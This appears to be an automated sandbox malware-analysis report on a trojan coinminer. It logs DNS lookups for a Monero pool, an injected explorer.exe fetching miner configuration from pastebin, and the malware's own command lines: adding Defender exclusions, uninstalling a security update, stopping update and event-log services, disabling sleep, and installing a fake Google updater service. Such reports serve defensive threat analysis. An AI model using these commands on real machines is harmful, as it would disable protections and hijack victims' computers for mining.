Oct 27, 2024 18:38:32.423281908 CET	1.1.1.1	192.168.2.10	0x575e	No error (0)	xmr-eu1.nanopool.org		51.89.23.91	A (IP address)	IN (0x0001)	false
Oct 27, 2024 18:38:32.423281908 CET	1.1.1.1	192.168.2.10	0x575e	No error (0)	xmr-eu1.nanopool.org		163.172.154.142	A (IP address)	IN (0x0001)	false
Oct 27, 2024 18:38:33.656609058 CET	1.1.1.1	192.168.2.10	0xcb6	No error (0)	pastebin.com		104.20.4.235	A (IP address)	IN (0x0001)	false
Oct 27, 2024 18:38:33.656609058 CET	1.1.1.1	192.168.2.10	0xcb6	No error (0)	pastebin.com		172.67.19.24	A (IP address)	IN (0x0001)	false
Oct 27, 2024 18:38:33.656609058 CET	1.1.1.1	192.168.2.10	0xcb6	No error (0)	pastebin.com		104.20.3.235	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pastebin.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49793	104.20.4.235	443	7744	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-27 17:38:34 UTC	114	OUT	GET /raw/VMnMCaJF HTTP/1.1 Accept: / Connection: close Host: pastebin.com User-Agent: cpp-httplib/0.12.6
2024-10-27 17:38:34 UTC	391	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 17:38:34 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: EXPIRED Last-Modified: Sun, 27 Oct 2024 17:38:34 GMT Server: cloudflare CF-RAY: 8d9475e4bdc52c8d-DFW
2024-10-27 17:38:34 UTC	438	IN	Data Raw: 31 61 66 0d 0a 7b 0d 0a 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 22 70 6f 6f 6c 22 3a 20 22 78 6d 72 2d 65 75 31 2e 6e 61 6e 6f 70 6f 6f 6c 2e 6f 72 67 22 2c 0d 0a 22 70 6f 72 74 22 3a 20 31 30 33 34 33 2c 0d 0a 22 77 61 6c 6c 65 74 22 3a 20 22 34 34 73 5a 66 69 37 54 75 64 51 44 41 7a 4b 63 6d 46 48 63 6f 59 38 6a 42 5a 62 59 62 53 41 4b 58 4c 64 45 74 50 41 6a 63 43 57 6a 56 67 34 46 76 78 35 53 57 4a 4d 67 59 67 69 62 77 4c 67 42 57 54 58 55 47 59 52 59 36 76 78 57 52 58 6b 66 39 34 48 54 55 61 4a 72 38 48 56 69 43 53 78 2e 73 70 61 69 6e 22 2c 0d 0a 22 70 61 73 73 77 6f 72 64 22 3a 20 22 22 2c 0d 0a 22 6e 69 63 65 68 61 73 68 22 3a 20 66 61 6c 73 65 2c 0d 0a 22 73 73 6c 74 6c 73 22 3a 20 74 72 75 65 2c 0d 0a 22 6d 61 78 2d 63 70 75 22 3a 20 Data Ascii: 1af{"algo": "rx/0","pool": "xmr-eu1.nanopool.org","port": 10343,"wallet": "44sZfi7TudQDAzKcmFHcoY8jBZbYbSAKXLdEtPAjcCWjVg4Fvx5SWJMgYgibwLgBWTXUGYRY6vxWRXkf94HTUaJr8HViCSx.spain","password": "","nicehash": false,"ssltls": true,"max-cpu":
2024-10-27 17:38:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	13:38:21
Start date:	27/10/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe"
Imagebase:	0x7ff776920000
File size:	6'031'872 bytes
MD5 hash:	C441BE4F7FD0F07FDCF94657C624C3DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:38:22
Start date:	27/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:38:22
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:38:26
Start date:	27/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff762bd0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:38:26
Start date:	27/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop UsoSvc
Imagebase:	0x7ff763b60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	13:38:26
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	13:38:26
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	13:38:26
Start date:	27/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop WaaSMedicSvc
Imagebase:	0x7ff763b60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	13:38:26
Start date:	27/10/2024
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff7f7de0000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	13:38:26
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	13:38:27
Start date:	27/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop wuauserv
Imagebase:	0x7ff763b60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	13:38:27
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	13:38:27
Start date:	27/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop bits
Imagebase:	0x7ff763b60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	13:38:27
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	13:38:27
Start date:	27/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop dosvc
Imagebase:	0x7ff763b60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	13:38:27
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	13:38:27
Start date:	27/10/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Imagebase:	0x7ff77a300000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	13:38:27
Start date:	27/10/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Imagebase:	0x7ff77a300000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	13:38:27
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	13:38:27
Start date:	27/10/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Imagebase:	0x7ff77a300000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	13:38:27
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	13:38:27
Start date:	27/10/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Imagebase:	0x7ff77a300000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	13:38:27
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	13:38:27
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	13:38:27
Start date:	27/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"
Imagebase:	0x7ff763b60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	13:38:27
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	13:38:27
Start date:	27/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"
Imagebase:	0x7ff763b60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	13:38:27
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	13:38:27
Start date:	27/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop eventlog
Imagebase:	0x7ff763b60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	13:38:27
Start date:	27/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
Imagebase:	0x7ff763b60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	13:38:27
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	13:38:27
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	13:38:27
Start date:	27/10/2024
Path:	C:\ProgramData\GoogleUP\Chrome\Updater.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\GoogleUP\Chrome\Updater.exe
Imagebase:	0x7ff6152a0000
File size:	6'031'872 bytes
MD5 hash:	C441BE4F7FD0F07FDCF94657C624C3DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 61%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	13:38:28
Start date:	27/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	13:38:28
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	13:38:30
Start date:	27/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff762bd0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	13:38:30
Start date:	27/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop UsoSvc
Imagebase:	0x7ff763b60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	13:38:30
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	13:38:30
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	13:38:30
Start date:	27/10/2024
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff7f7de0000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	13:38:30
Start date:	27/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop WaaSMedicSvc
Imagebase:	0x7ff763b60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	13:38:31
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	13:38:31
Start date:	27/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop wuauserv
Imagebase:	0x7ff763b60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	13:38:31
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	13:38:31
Start date:	27/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop bits
Imagebase:	0x7ff763b60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	13:38:31
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	13:38:31
Start date:	27/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop dosvc
Imagebase:	0x7ff763b60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	13:38:31
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	13:38:31
Start date:	27/10/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Imagebase:	0x7ff77a300000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	13:38:31
Start date:	27/10/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Imagebase:	0x7ff77a300000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	13:38:31
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	13:38:31
Start date:	27/10/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Imagebase:	0x7ff77a300000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	13:38:31
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	13:38:31
Start date:	27/10/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Imagebase:	0x7ff77a300000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	13:38:31
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	13:38:31
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	58
Start time:	13:38:31
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	13:38:31
Start date:	27/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer.exe
Imagebase:	0x7ff609fd0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
